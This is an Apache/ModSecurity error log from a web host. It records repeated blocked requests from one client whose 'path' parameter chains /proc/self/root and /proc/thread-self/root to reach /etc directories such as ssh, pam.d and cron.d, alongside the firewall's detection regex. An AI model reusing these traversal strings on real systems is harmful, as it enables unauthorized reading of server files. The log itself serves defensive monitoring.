[Tue Mar 17 21:59:54.316992 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:32772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5CuyqAr6etmhZHNpUBQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:58.077513 2026] [:error] [pid 18211:tid 140411674785536] [client 74.7.241.31:41772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5DhcIZFNFgEhGGCRECAAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:59.634871 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:41780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5D4h-PF_25v4hFRCX9QAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:00.090545 2026] [mime_magic:error] [pid 17972:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:52942] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb
[Tue Mar 17 22:00:01.328809 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:41782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5EQkwaGbbGflqUZCwqQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:02.613907 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:41782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5EgkwaGbbGflqUZCwqgAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:04.036694 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:41782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5FAkwaGbbGflqUZCwqwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:07.129789 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:00:07.411805 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.241.31:38240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5F4h-PF_25v4hFRCX9wAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:09.557039 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:38242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5Gew_le52K8_3pV15gQAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:11.423774 2026] [:error] [pid 18211:tid 140411741927168] [client 74.7.241.31:38244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5GxcIZFNFgEhGGCREFgAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:13.112683 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:38260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5HQkwaGbbGflqUZCwsAAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:15.312170 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:38266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5H4h-PF_25v4hFRCX-AAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:28.145819 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:00:29.667921 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:40182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5LRj0p0SRWAqcjGGm_QAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:31.279725 2026] [:error] [pid 17972:tid 140411565680384] [client 74.7.241.31:40186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5L4Z5-GlpYjVrXCricgAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:34.243854 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:40192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5MIh-PF_25v4hFRCX_QAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:37.907861 2026] [:error] [pid 18211:tid 140411649607424] [client 74.7.241.31:40206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5NBcIZFNFgEhGGCREIAAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:39.414440 2026] [:error] [pid 18211:tid 140411590858496] [client 74.7.241.31:36450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5NxcIZFNFgEhGGCREIgAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:50.125817 2026] [proxy_fcgi:error] [pid 18211:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:00:51.650757 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:47266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5Q4h-PF_25v4hFRCYAwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:52.807540 2026] [:error] [pid 25836:tid 140411708356352] [client 74.7.241.31:47266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5RIh-PF_25v4hFRCYBwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:54.380854 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:47266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5Roh-PF_25v4hFRCYDgAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:56.525662 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:47274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5SNa6ubjKNq_cu4YzZAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:00:58.288201 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:56028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5SuyqAr6etmhZHNpUGwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:00.391676 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:56044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5TNa6ubjKNq_cu4YzZgAAA0g"], referer: 